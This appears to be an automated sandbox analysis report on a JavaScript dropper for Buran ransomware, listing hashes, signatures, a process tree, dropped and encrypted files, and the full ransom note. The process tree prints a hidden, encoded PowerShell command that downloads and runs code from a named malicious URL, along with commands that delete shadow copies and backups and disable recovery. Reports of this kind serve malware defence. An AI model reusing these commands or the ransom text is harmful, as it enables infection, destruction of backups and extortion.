Overview

overview

10

Static

static

6440.js

windows7_x64

10

6440.js

windows10_x64

10

Analysis

  • max time kernel
    129s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    31-08-2021 16:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6440.js

  • Size

    541KB

  • MD5

    268848cb4ff95f5b95a8c619b626eb1e

  • SHA1

    1ba3890f085853d01475ddf9fa3d991dee706be6

  • SHA256

    f827fc739c432960cabffffa30111ac512e019928c22ce6f55efca587bdb75bf

  • SHA512

    07cfd18fa8ec70db0a1c0f061ee5c6951979bada17777dd30cc473ee0cb161882109920a8d46ca961d4626231d94b4bac85a52180c34ae90442d16d70192781c

Score
10/10
buranpersistenceransomware

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://jolantagraban.pl/log/57843441668980/dll/assistant.php

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Reserved email: [email protected] Your personal ID: 752-02C-F46 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

    ransomwareburan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\6440.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4796
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3056
        • C:\Users\Admin\AppData\Local\Temp\CWPpV.exe
          "C:\Users\Admin\AppData\Local\Temp\CWPpV.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1416
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Suspicious use of WriteProcessMemory
            PID:3104
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3160
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                wmic shadowcopy delete
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4736
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
              6⤵
                PID:4480
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                  PID:3460
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                  6⤵
                    PID:4336
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -agent 0
                    6⤵
                    • Executes dropped EXE
                    • Modifies extensions of user files
                    • Drops file in Program Files directory
                    • Drops file in Windows directory
                    PID:4516
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4564
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3336
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      7⤵
                      • Interacts with shadow copies
                      PID:3696
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4332
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      7⤵
                      • Interacts with shadow copies
                      PID:4740
                  • C:\Windows\SysWOW64\notepad.exe
                    notepad.exe
                    6⤵
                      PID:4224
                  • C:\Windows\SysWOW64\notepad.exe
                    notepad.exe
                    5⤵
                      PID:2740
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2760

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
              MD5

              bc382383b6c90d20dba3f58aa0f40ade

              SHA1

              b626e4d049d88702236910b302c955eecc8c7d5f

              SHA256

              bf25937b534e738f02e5ec01592dd9a72d79e67bc32f3a5e157a0608f5bbd117

              SHA512

              651e85acf56ec7bffdc10941ba3bcebea5aede44d479e4db5d61160de2b975c484499a95564adaf90f350d6a1bf3aa97774019f1464045114cbb97806fc76c2f

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
              MD5

              a2981517afbb3ebe48d2168b07274f47

              SHA1

              78e0fa382ca97436ec5c43209a2e391b41d356ab

              SHA256

              f5ef795d1577213ce930034afc93387232cc95dfe53db40db0ed65fbb44bcfae

              SHA512

              4e939a2270036ebf0eaec96ba231eb38cb4e2389064a30e5f3b9e5e5581d363ab934431e69978e015f25f3352d17e3b3242d02357aa034838a94912fa8d6ba15

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
              MD5

              0465994d32988b4ff5811340c4905188

              SHA1

              7b4043cbd9509bc78b08863ad22b720632686785

              SHA256

              b33b95c79ca7fc2da4e43282f29ec14db42bdafd53c8888de793cea52caa20bb

              SHA512

              04654263a6391c84e0fd230a992dbd107f905599a066d124055591ce19a9d74b61627bb9d4dc9df89f396b12f795b649f0331e4aad39304a5ad0e0bccc36ad43

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
              MD5

              874bcb16511e41929619a8b58049841c

              SHA1

              86a68e2ac631e5d2794c23ae3d1674a781f859a9

              SHA256

              a7d7585340a941a6a02e34ac1cafe1ab67d00a6213fef1dc5eead60f414b757a

              SHA512

              ffb520a8af765454b6d96acdd15d873bdc63d4719ec647fec50e47709758308ebd1ee176c44b07943d040d1fb04337d7aebf9be01d8592ddfd021c3334bdf8a0

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
              MD5

              729871a45f6a5eb51e0522d0d6605bf7

              SHA1

              15d1de6ca14958a5b88e9aa75fcad5e3f7b0eb80

              SHA256

              217df7a659569e75f00f70d4e7fc9cc2b2ef733673958af97312bc04eca28afc

              SHA512

              02b6081ff004a80abfbe713c76c7fcbcb96ddc9cb238662eea9e3c4f4954d1b0cc15f56bb6dc61ba91ed7e5b54da45a8dd95d7b406a107e7291aedf8c4fff842

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
              MD5

              b8e117cacec9368a914e114927a7e451

              SHA1

              5dd260a9fe206789850b4cd9420b5a1b94967e0d

              SHA256

              02992e9f162dca02ccd7b23808872641ea80dd4a21d1c2cafbc9f40e5815477f

              SHA512

              0820b05b45615571eb3ad5a23d84e433dd22a48a72a51e9c365f4a300844761377479e4246167231238612fa2b47fefdaff8e31a95cc230ad02d089a3256f0c5

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\OBFDX09A.htm
              MD5

              b1cd7c031debba3a5c77b39b6791c1a7

              SHA1

              e5d91e14e9c685b06f00e550d9e189deb2075f76

              SHA256

              57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

              SHA512

              d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\BJ1A9C3J.htm
              MD5

              8615e70875c2cc0b9db16027b9adf11d

              SHA1

              4ed62cf405311c0ff562a3c59334a15ddc4f1bf9

              SHA256

              da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d

              SHA512

              cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\CWPpV.exe
              MD5

              dcef208fcdac3345c6899a478d16980f

              SHA1

              fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

              SHA256

              824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

              SHA512

              28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\CWPpV.exe
              MD5

              dcef208fcdac3345c6899a478d16980f

              SHA1

              fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

              SHA256

              824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

              SHA512

              28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\~temp001.bat
              MD5

              ef572e2c7b1bbd57654b36e8dcfdc37a

              SHA1

              b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

              SHA256

              e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

              SHA512

              b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
              MD5

              dcef208fcdac3345c6899a478d16980f

              SHA1

              fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

              SHA256

              824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

              SHA512

              28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
              MD5

              dcef208fcdac3345c6899a478d16980f

              SHA1

              fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

              SHA256

              824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

              SHA512

              28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
              MD5

              dcef208fcdac3345c6899a478d16980f

              SHA1

              fd127c6ecaee57972b7acc3b8e4a2d3b25f928e0

              SHA256

              824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc

              SHA512

              28e403a6d66895a2461828f49acb2862602e6be94405657bee0aec5d35d86dd83713c4cd1f33d28b94fed6546633683f9ffa693d37dc94bc862f6584833f9fba

              Download Submit

            • C:\Users\Admin\Desktop\ClearExpand.TS.kd8eby0.752-02C-F46
              MD5

              3c82f35a54fbe6f5bd22a687d7a7a8a0

              SHA1

              9c866a68998d12d8734b8e1090c41dc61bf166cf

              SHA256

              94b6ddbc524b53bd86d3739dc196e0f361e6816644a239460d932b4e21cd0e8d

              SHA512

              65ae7c7c600a5ac9d5b40a963ed246b49878ec03d19e9b96a961587368eec6c743dcdeb4ea81cf4cf091943c7530c7c035a362dbd80c8550b6382e61048abcb5

              Download Submit

            • C:\Users\Admin\Desktop\ConvertFromImport.3g2.kd8eby0.752-02C-F46
              MD5

              d8c7cce5795b68fac5acc14029f3b9a4

              SHA1

              214a038a58392decf7a822053c0dee420dd601c4

              SHA256

              d97f19e200167a39a92574e06efaf2141febdcae00333260b4a60d7b39f66d51

              SHA512

              38d1f5e6a93db9ca0cb36120b0cdfe76800885bb2069e5b748095ee0d43891acf85d67ea750864404b209744cc6684b16eb7160a411bb15ce4f5970bf042f663

              Download Submit

            • C:\Users\Admin\Desktop\DisableImport.emf.kd8eby0.752-02C-F46
              MD5

              650c304b2c4570967d8cd24d05f72d02

              SHA1

              91986c4d761946b3909a95bfbc68fcc6c855fb29

              SHA256

              2848a8ea11dcc1a697dc365b13ead1ffb0d98da16615361c8851e84dda7817ed

              SHA512

              e9235af022ac40eecdb2315fa38c638a3604803936877038217bd5152843e27ae6fe6263b23d4e01baa4f4c1661091b7b2fab92b41434f3a9e55bdd048e4eea5

              Download Submit

            • C:\Users\Admin\Desktop\EditWrite.mp2.kd8eby0.752-02C-F46
              MD5

              1ecd3b2617fc113b2bbb0b45c3019f3d

              SHA1

              3e751cd9455dc1cc5c4040a1d1f0a61c99ea5357

              SHA256

              f70155154164a129843af3879d53d0de9273a1850a47f450e5567a1cd230c3b4

              SHA512

              c502457ee63d1890a95bff513715f73572b7a7b20dac87cdbad96a9a94bc7a99e0d3056c81c2dba191936cb4ffad4def6c6addf552afb41cf05859b113e8799d

              Download Submit

            • C:\Users\Admin\Desktop\EnterSplit.wmv.kd8eby0.752-02C-F46
              MD5

              4059539f842bbf4a9279867509d1754b

              SHA1

              47204b5ef9c9e7417978aefd40873cd51ac49b86

              SHA256

              57566295973846203a292c57e275b306b1ce38b35595111d6f77d323136e5625

              SHA512

              134cf21bb500e7bd661d35d4081ed0c067560b36874bb52d150c9ec9c1f0029d85349aa7bf07e165ee75932b1108f9041f965dd88c883bdf9144485ddb06ace9

              Download Submit

            • C:\Users\Admin\Desktop\GetSubmit.mpeg.kd8eby0.752-02C-F46
              MD5

              f91d89cdb00d6a95f3379cfa34d36168

              SHA1

              0b944fc1289dc71a42fb8ce5454d671be3031b59

              SHA256

              5d425e4114bb94d989fbfa464f49d8fdb7df20c55880ad0a7a9364e2b08c97bb

              SHA512

              b13f7fffe03a78b1b7b702050f03239422d925128c0e9762a36b492b5845a32e3a96352ea9254b82d9ff81960a122914187d6a03eea317408af0814e59bb8fb3

              Download Submit

            • C:\Users\Admin\Desktop\GrantRestore.pptm.kd8eby0.752-02C-F46
              MD5

              eeef113ba5eea622e3afbbc793b984cc

              SHA1

              2545aca5467823f4b5b2495d753cd8098286fe6e

              SHA256

              635fad0751d1bedc606111215b48881a8fc3644117f07de080e5c19a94dfc2bc

              SHA512

              2119dec8a590229f1915c70dc2ce56d3c9708777853a2bd69d3e4e2d080067c57a92bb6169a4f87a90108a5ffcd28f2ad295ed8f377b42841b2f027aed9227b6

              Download Submit

            • C:\Users\Admin\Desktop\InvokeDisconnect.csv.kd8eby0.752-02C-F46
              MD5

              12679aeda77c5554d89fd19e99bae7a6

              SHA1

              21431fdd0c4799a81c97ca5897ee103caa293cf9

              SHA256

              5ecd7aa5784a386e5bd515041fc453c47c5b7d4d51309d5cb46e771d29abd25f

              SHA512

              468effddab5b50d5b0bdbee2fd01dbfdca04816ca1cef0bedfb913d7a8e22ca4de0165eee52be4f7327937a9af5efa62a340d4267df7966d9c8e56529c0e5f54

              Download Submit

            • C:\Users\Admin\Desktop\LimitDeny.tiff.kd8eby0.752-02C-F46
              MD5

              1f528720da1c15c9a40af9f707d4c4b7

              SHA1

              65c515cafc3206b61b4d03a8bef5e488096ec645

              SHA256

              eff45332f4a1e95829d47160d8b5e5ff17343f7763ea7155a5818abde29594ed

              SHA512

              064917427abac9fe717f457a7309692621318a4f99cd6bee5821a885e907ae862ca68234f54f1dea5706ecde9006bc3f635f97d8cac17d417a766733ba483eae

              Download Submit

            • C:\Users\Admin\Desktop\LockOpen.aiff.kd8eby0.752-02C-F46
              MD5

              d1b94cba7f3d853d231273852546ba52

              SHA1

              b853832f095af04a11d65b0da6683849e5823d84

              SHA256

              309a73a386ad4f97caddbeb0349dca049c0a083d6307b7e387f240adf3ba76ce

              SHA512

              e8c7c414a97ddcb9b581ea72f4cb7b9255b5fe2e2868ee991db39c88da9d76fb5209f73edf5ba4aa0203d00cc6621df4083db7536d2dc777b20a494c49a806fa

              Download Submit

            • C:\Users\Admin\Desktop\LockSet.mp2.kd8eby0.752-02C-F46
              MD5

              f9dc804fbde9c954e053d26b7f024e27

              SHA1

              5ee04edec8ad016d53cef4b478237d1cebaba699

              SHA256

              b9518af288bcfc2aafdf6b575dd9ed7cc633cd46f135e550369089be58a24ef3

              SHA512

              ff60760f5ddd68a07225f632752ca226a2baab268d3896314552a1ab5bd3934b285aec1807c63e2de5a655bb5beb13d8366c1d4d929f917bf767c3aaedb2b1f9

              Download Submit

            • C:\Users\Admin\Desktop\PingStop.xlsb.kd8eby0.752-02C-F46
              MD5

              f6114dcb14c36685c89b824cbac010fc

              SHA1

              d38796b93e4ecc76d46847e0a65d2216c19909e6

              SHA256

              eb84127cbfc301e6f13873399e949a0e25b111eb98ccbb63a53b2958005eee0e

              SHA512

              7b1e00be7c07015504f5f9da8fbed9070c49b00ffb7be3e130d6fd9fb08106f595ca4fa0ff8b39e48aaaf01ec1b1f4786fb7f032bab18dc720bdcb874ffa2535

              Download Submit

            • C:\Users\Admin\Desktop\ReadInitialize.ps1.kd8eby0.752-02C-F46
              MD5

              a5659db27d688c5ccd2c8598258ada9e

              SHA1

              310da90a7fe1745930a975ab1a583fc686ffd843

              SHA256

              004bc372d99d99c62b11ea732c4a6f81ea74353ea647bffd8f10658c6d6513af

              SHA512

              8f82d4d202a5a0b22d3af71ffdb0f4a8511dc9ee38c97e370adc6ac47863c96f453bfe0a3e8e6317f1142458eed372884cc1a4b14986271e305be8a287bd34ca

              Download Submit

            • C:\Users\Admin\Desktop\RepairShow.odp.kd8eby0.752-02C-F46
              MD5

              a05f6b1ce03c0a9247228c3ea4b25105

              SHA1

              43a3d3aaadd830bdda3a0d0fb2106d0e92e4a3ff

              SHA256

              3dbe3ba64680f74e185d53b9f29ebc2366b2287056ca8671fa7b58d49bdbad57

              SHA512

              4ea2b8957ac54d2eccd04b580d6e7ce5e7383ffb8ca9c4cfdc93a421e32450c8aaf7babe0c43c5c80353738a9ab0d2e8b8e50224647868bc2988a6ca53584d01

              Download Submit

            • C:\Users\Admin\Desktop\SaveBackup.pptx.kd8eby0.752-02C-F46
              MD5

              19e83f5a330579b168c21d8d9281384f

              SHA1

              8d1d9054ae72d69828fa332d20806f1a68da6a1c

              SHA256

              f49c94f1431d6989d0f3264934edd79c3342213609de36c8d637ca417b93b8fb

              SHA512

              4be5a6e6fb2c0098678c65b87cb1279be0b7c74cdc436f2fc3de536d79d83b55346b544323ef1fc00ce1d2579ac13820c416891177bf5df267b4a36955c8aaf6

              Download Submit

            • C:\Users\Admin\Desktop\SendSave.eps.kd8eby0.752-02C-F46
              MD5

              8ed3006ef9c661ff3af1b5753096faba

              SHA1

              646e54b7922153a7d1abce81349dec1c56bc1aff

              SHA256

              91a87c556a520ed1580ea915cd734c8dc480bec35df6a5c775954936bb585d9b

              SHA512

              668c488d0a0b870d96b32e8e86e637044f923bf2a185556cab3c3bcc902752cd672320fdae987cbe0d00524b638f7abc851d51902c48dd8e4478edc02dd74e9d

              Download Submit

            • C:\Users\Admin\Desktop\SetGet.M2TS.kd8eby0.752-02C-F46
              MD5

              0666e152e7cabde0af03cf4b723e6b3b

              SHA1

              ea237a787b233ffbdd3266027c0faaeec99721c8

              SHA256

              c16e560777e18c322af7981729cb75b9f883ffa91a27bbc0ac6ac15a20c6e144

              SHA512

              dd8708f3fdbdfabb866dd529192ce49783fc1243773453f93dbf60783921e1bd9099cd40edfea18ed68287eea4a375c72805ffe11aadbaa4b8f78d4d851e040d

              Download Submit

            • C:\Users\Admin\Desktop\SkipRevoke.wmf.kd8eby0.752-02C-F46
              MD5

              bfae28e1daa28b0774027c6711e44a6e

              SHA1

              d635211f9f6f2dee34bf589f14f26b57f79cc2a6

              SHA256

              1695035e0b8f5bfe036401469fd16f27a231101b4c143d3ffbcc81bc00bafc01

              SHA512

              163d2dd6dcc8cdbb730fb0a21dfb8ec070e0e807d26e3db21f7f7c5ea0634bb142d92deb182c9c76fa1085458829b956f47e4526015f4cc7b31a8f07045955d6

              Download Submit

            • C:\Users\Admin\Desktop\SplitMove.bmp.kd8eby0.752-02C-F46
              MD5

              ec6e63f7dc553e5ee6b442b4093d89d4

              SHA1

              3c6e2b5236404131643dee85d5a31af41a2c973c

              SHA256

              1f2f6a9bd897be7c892fb5dd349a7ba4de0eb77f2e23220325409315b461b2bc

              SHA512

              098c2bc03bc4aa26d660b582e9cf6c340e7d9fbe9bc1d2a25aafb4605fc1f3d31d14baa2cb4a974d74ab0f646b408570878bdb518b35e475633743f1d7d0f9db

              Download Submit

            • C:\Users\Admin\Desktop\SuspendExport.css.kd8eby0.752-02C-F46
              MD5

              89ec51e82dba85eec3c45a5aee320c4b

              SHA1

              29373afe71e42c6e3dd6394ef0daed45e678cd16

              SHA256

              6d068ea3dc4a08ff2badf01d345fe7d9f7e396fb616bc3a92ec5dd9048da4ad2

              SHA512

              a92f31c9f057ed9f65c6cde5c80f84c277dec68f0d48324fae77bea69eade23a60c9d0e0b68b330b189bc4c162fe1fce71bcf429e885d528179bc664ac72c294

              Download Submit

            • C:\Users\Admin\Desktop\SwitchLimit.dotx.kd8eby0.752-02C-F46
              MD5

              0cae19ca9fd791aa4bbb1c4424733839

              SHA1

              f11c00d9c71944f1c74f701055f07cf7ea9b6587

              SHA256

              aa20f85236c7e0def1478fa29ec48381063a9271659674c6405e40982635b119

              SHA512

              ba1e50e2a4e74dabaf70d765e26dfc933c15314c39c1c3efd6d051a09d6a11747bee3c5be6cc3f704189feca0dbc8ff6b61d2ff865cfa84dec56ae34b199a8a0

              Download Submit

            • C:\Users\Admin\Desktop\SyncSave.xltm.kd8eby0.752-02C-F46
              MD5

              3538fec5430cb2998e6e464fa03d2d9e

              SHA1

              30f2b75b61f39bd272e08ee2547c05de0da0cf59

              SHA256

              75855f50f30cb32a4ee8b38bbd14770571f8d76137f7df8666033e79c767d647

              SHA512

              e5da85139f16b83c3264bbc5d8a39666973b499e7413f82bbcd94e64fec2d65fe3c29218c3185074e47804c6425cf651914359e6a367d0802cc4f8ca065dd644

              Download Submit

            • C:\Users\Admin\Desktop\TraceDisconnect.ico.kd8eby0.752-02C-F46
              MD5

              3985d790f1071e8981bb9ec49e53ada5

              SHA1

              70d6872f389c4005c254afaadad605a53b795382

              SHA256

              6995c6f3319961356d33c13b8660312b1b545c2c01c2bb6eba2f62d3c41db0f8

              SHA512

              7aeedf487c3a4a1cb96d625e9aeae1d22954b99302f32ffe0d045bfceca6cd242bf9640783e7b88561116b9237dab361e287682e38c22938766a386526bc65b1

              Download Submit

            • C:\Users\Admin\Desktop\TraceLock.inf.kd8eby0.752-02C-F46
              MD5

              c94c2d3a0939a974b04f74ced23a95f2

              SHA1

              f4ed8f6cb0ea4d9ec9d836a0c6faf8cc5a8b8a66

              SHA256

              292c8a98674372f98d762ce01b3b9291766a965f85e0c27a7f4dd030e8ffe6ef

              SHA512

              16df8595c325e0c291700793a24d4958f5f11bc8d3f483bd621da813e82b4a1dcfd08d3e2a145fb05b55610d243634dd6770ae0b5aedb8d31b3f26909da83fe0

              Download Submit

            • C:\Users\Admin\Desktop\UnprotectComplete.vst.kd8eby0.752-02C-F46
              MD5

              fba34b847822ba28c4968a558251de3a

              SHA1

              441fbe88e587cdc0105f5bc75daaa9e6d8527e4a

              SHA256

              3442eef75fab103cc4843cdc5a39af2a3ea1d12dc1958c63af9a79a01ecf9227

              SHA512

              8b3b3e9f405c10f1ae9bcf102bd5808e64bb399332ef490a17e2e97d33d0f4e43158ada39ce74d58315cb806add4cda98c4d2cb4b418f989b17b9c81d5d85e38

              Download Submit

            • C:\Users\Admin\Desktop\UnprotectRedo.ogg.kd8eby0.752-02C-F46
              MD5

              709ea9496a45a60520f520bfc6977643

              SHA1

              424ad0ce01a09fcf11b8bc245b50fe653fe2f3f2

              SHA256

              1a2e2732ea02fbaf8fa0ecc37eca1ffc8bb76d5071e0840193cbb41b2b0a6df4

              SHA512

              eba3e479ff7476f853154d7aff644ccb6c7a7038ea824a16b42d874c23d78c66d7b863f5808c1f4205118ddeb753e266c20abcbb8633f5b80b48b4c822b01afa

              Download Submit

            • C:\Users\Admin\Desktop\UseOpen.ini.kd8eby0.752-02C-F46
              MD5

              109d21026dd35fc29bf1a6f41516709a

              SHA1

              ba56dde51a6195b477cde23ffc65d61d3eb21c2c

              SHA256

              5e792d13507ce93c5eee0b9fce68da6f763a24a248e4f1780db89520f9ae0323

              SHA512

              83abf4053494f13e93fd245052a2ee640502a0b0b161a99c0cc1e2a505328336ebbfccca9116dc0f7a0d8ea3e3ebe4d365aa00eb59b46625d3535e3b866725a8

              Download Submit

            • memory/1416-149-0x0000000000400000-0x0000000000557000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/1416-148-0x00000000009B0000-0x0000000000AF5000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/1416-144-0x0000000000000000-mapping.dmp

              Download

            • memory/2740-163-0x0000000002390000-0x0000000002391000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2740-153-0x0000000000000000-mapping.dmp

              Download

            • memory/3056-128-0x0000020E00390000-0x0000020E00391000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3056-115-0x0000000000000000-mapping.dmp

              Download

            • memory/3056-143-0x0000020E7DA76000-0x0000020E7DA78000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3056-134-0x0000020E7DA73000-0x0000020E7DA75000-memory.dmp

              Filesize

              8KB

              Download

